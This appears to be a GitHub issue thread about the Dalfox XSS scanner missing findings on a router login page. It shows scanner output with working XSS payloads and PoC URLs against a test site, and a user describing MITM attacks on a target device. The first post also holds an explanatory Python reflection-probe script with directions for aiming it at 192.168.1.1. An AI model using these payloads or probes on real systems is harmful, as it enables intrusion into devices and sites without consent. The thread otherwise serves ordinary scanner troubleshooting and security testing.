hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License
3.46k stars 389 forks

Scanning Router Login pages #460

Open CHillyVibes opened 1 year ago

CHillyVibes commented 1 year ago

Question

Your questions: When I scan a router login page it doesn't show any exploitations available, but I know that the login page is exploitable because it is susceptible to XSS during a MITM attack.

Environment

What method is available for me to exploit our given target? Thanks dev team, btw. What parameters would you consider using in order to see if our payload executed successfully without the URL encoding?

sudo ./dalfox url http://testphp.vulnweb.com/listproducts.php?cat=1 -b /home/kali/scripts/cookies.js


🌙🦊 Powerful open source XSS scanning tool and parameter analyzer, utility

🎯 Target              http://testphp.vulnweb.com/listproducts.php?cat=1
🏁 Method              GET
🖥 Worker              100
🔦 BAV                 true
⛏ Mining              true (Gf-Patterns)
🔬 Mining-DOM          true (mining from DOM)
🛰 Blind XSS Callback  /home/kali/scripts/cookies.js
⏱ Timeout             10
📤 FollowRedirect      false
🕰 Started at          2023-03-22 00:54:14.754845369 +0000 UTC m=+0.011778748

[*] 🦊 Start scan [SID:Single] / URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toOpenRedirecting
    check the manual that corresponds to your MySQL server version
[POC][G][GET][BUILTIN] http://testphp.vulnweb.com/listproducts.php?cat=%2F%2F%2F%2509%2Fgoogle.com
[I] Found 2 testing point in DOM base parameter mining
[I] Found 1 testing point in Dictionary base paramter mining
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => PTYPE: URL Injected: /inHTML-none(1)
    $ 48 line:  Error: Unknown column '1DalFox' in 'where cl
[W] Reflected Payload in HTML: cat='><a href='javascript&colon;alert(1)'>click
    48 line:  syntax to use near ''>click' at line 1
[POC][R][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[V] Triggered XSS Payload (found DOM Object): cat=<div contextmenu=xss><p>1<menu type=context class=dalfox id=xss onshow=prompt.valueOf()(1)></menu></div>
[POC][V][GET][inHTML-none(1)-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%3Cdiv+contextmenu%3Dxss%3E%3Cp%3E1%3Cmenu+type%3Dcontext+class%3Ddalfox+id%3Dxss+onshow%3Dprompt.valueOf%28%29%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E
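Two things a practitioner would check before concluding that Dalfox has a false negative on the router. In the command above, -b is Dalfox's blind-XSS callback option and expects a URL (the help text gives the example -b https://hahwul.xss.ht), which is why the banner reports the cookie file path under "Blind XSS Callback"; a cookie header goes through -C, and a login form that posts credentials needs -d 'username=admin&password=admin' (which makes Dalfox use POST) so the form fields are tested rather than only the query string. Second, Dalfox's [R]/[V] verdicts come from parameter analysis: it echoes a marker plus the characters <>"' into each parameter and reports where the marker lands and which of those characters come back raw, and a parameter is only worth a payload when it can open a tag or close the attribute or string it landed in. The script below is an added example, not Dalfox code, that reproduces that reflection check against a constructed in-memory stand-in for a router login page so it runs offline; fake_router, its parameter names and the page it returns are assumptions. Replacing fake_router with a function that POSTs the parameters to http://192.168.1.1/ (the address from this thread) and returns the response body makes it run against the real device.

```python
import html
import re
import secrets

# Characters whose survival in the response decides whether a reflection is usable.
SPECIALS = "<>\"'"

# Parameters the login form submits; values are the harmless defaults sent with every probe.
BASE = {"username": "admin", "password": "admin", "redirect": "/"}


def fake_router(params):
    """Constructed stand-in for a router login page (assumption, not a real device).

    'username' is echoed twice: entity-encoded inside the input's value attribute
    and raw inside the error text. 'redirect' is encoded. 'password' is never echoed.
    """
    user = params.get("username", "")
    redirect = params.get("redirect", "/")
    return (
        '<html><body><form method="post" action="/login">'
        f'<input name="username" value="{html.escape(user, quote=True)}">'
        f'<input type="hidden" name="redirect" value="{html.escape(redirect, quote=True)}">'
        '<input type="password" name="password">'
        '</form>'
        f'<p>Login failed for user {user}</p>'
        '</body></html>'
    )


def make_canary():
    # Random marker so we recognise our own echo and nothing else on the page.
    return "dfx" + secrets.token_hex(4)


def context_at(body, idx):
    """Rough reflection context of body[idx]: 'script', 'attribute' or 'html' text."""
    head = body[:idx]
    lowered = head.lower()
    opened = lowered.rfind("<script")
    if opened != -1 and lowered.find("</script", opened) == -1:
        return "script"          # inside an unclosed <script> block
    if head.rfind("<") > head.rfind(">"):
        return "attribute"       # a tag was opened and not yet closed
    return "html"


def surviving_specials(body, pos):
    """Walk the echoed probe after the canary and report which specials came back raw."""
    survived = ""
    for ch in SPECIALS:
        encoded = html.escape(ch, quote=True)   # &lt; &gt; &quot; &#x27;
        if body.startswith(ch, pos):
            survived += ch
            pos += 1
        elif body.startswith(encoded, pos):
            pos += len(encoded)
        # otherwise the character was stripped: stay put and test the next one
    return survived


def analyze_param(send, param, base):
    """Return one (context, raw_specials) tuple per place the canary is echoed."""
    canary = make_canary()
    body = send({**base, param: canary + SPECIALS})
    return [
        (context_at(body, m.start()), surviving_specials(body, m.end()))
        for m in re.finditer(re.escape(canary), body)
    ]


def injectable(findings):
    """Can any echo start a new tag, or break out of the attribute/string it sits in?"""
    for ctx, raw in findings:
        if ctx == "html" and "<" in raw and ">" in raw:
            return True
        if ctx in ("attribute", "script") and ("'" in raw or '"' in raw):
            return True
    return False


def scan(send, base):
    """Probe every parameter in `base` and say which ones are worth a real payload."""
    return {p: injectable(analyze_param(send, p, base)) for p in base}


if __name__ == "__main__":
    for param, hit in scan(fake_router, BASE).items():
        detail = analyze_param(fake_router, param, BASE)
        print(f"{param:10s} {'injectable' if hit else 'not injectable'}  {detail}")
```

The first echo of username sits in an attribute and comes back fully encoded, which on its own would be reported as safe; only because the script keeps looking does it find the second, raw echo in the error text. That is the same reason Dalfox reports a PTYPE and injection context per reflection rather than a single yes/no, and it is the first thing to look at when a scan of a page you know to be vulnerable comes back empty.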

hahwul commented 1 year ago

Hi @CHillyVibes, thank you so much for submitting the issue! I didn't understand the question exactly. Is it a question about false negatives?

Since Dalfox uses different payload combinations, sometimes... you can also use payloads that require interaction. Dalfox tries to find an XSS that triggers as soon as it is opened in the browser, preferably, but sometimes it gives me a slightly complicated PoC.

ChillVibesMushroom commented 1 year ago

> Hi @CHillyVibes, thank you so much for submitting the issue! I didn't understand the question exactly. Is it a question about false negatives?
>
> Since Dalfox uses different payload combinations, sometimes... you can also use payloads that require interaction. Dalfox tries to find an XSS that triggers as soon as it is opened in the browser, preferably, but sometimes it gives me a slightly complicated PoC.

It's about Dalfox not showing vulnerabilities at all, but I know the router login page is vulnerable to stored XSS and reflected XSS because I can inject scripts into the web page and execute scripts from the URL bar when doing a MITM attack and visiting from a target device.

It works wonders against websites, showing me vulnerabilities, and I have even applied XSS attacks with the vulnerabilities found and they do exploit the web pages correctly. I'm looking for the same finds when targeting a router with the URL being the IPv4 address 192.168.1.1.